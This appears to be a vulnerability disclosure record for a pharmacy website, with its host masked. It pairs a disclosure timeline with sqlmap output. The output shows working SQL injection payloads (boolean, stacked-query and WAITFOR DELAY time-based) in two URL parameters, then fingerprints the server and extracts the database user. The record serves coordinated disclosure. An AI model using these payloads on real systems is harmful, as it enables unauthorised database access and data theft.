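2015-12-24: Details reported to the vendor; awaiting vendor response
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public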
Injection point: http://**.**.**.**/pharmacy/ContentAspx/ViewCotent.aspx?pk=15062300001&isClass=10&setTable=2
Two parameters are injectable:
Place: GET
Parameter: pk
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pk=15062300001' AND 4124=4124 AND 'deoo'='deoo&isClass=10&setTable=2

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pk=15062300001'; WAITFOR DELAY '0:0:5';-- AND 'iRlB'='iRlB&isClass=10&setTable=2

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pk=15062300001' WAITFOR DELAY '0:0:5'-- AND 'fwlJ'='fwlJ&isClass=10&setTable=2

Place: GET
Parameter: isClass
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pk=15062300001&isClass=10' AND 2928=2928 AND 'tIgd'='tIgd&setTable=2
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: pk, type: Single quoted string (default)
[1] place: GET, parameter: isClass, type: Single quoted string
[q] Quit
>
[15:54:27] [INFO] testing MySQL
[15:54:28] [WARNING] the back-end DBMS is not MySQL
[15:54:28] [INFO] testing Oracle
[15:54:29] [WARNING] the back-end DBMS is not Oracle
[15:54:29] [INFO] testing PostgreSQL
[15:54:29] [WARNING] the back-end DBMS is not PostgreSQL
[15:54:29] [INFO] testing Microsoft SQL Server
[15:54:30] [INFO] confirming Microsoft SQL Server
[15:54:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:54:32] [INFO] fetching current user
[15:54:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:54:32] [INFO] retrieved: mytspp
current user: 'mytspp'
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-12-24 19:17
Thank you for the report.
None yet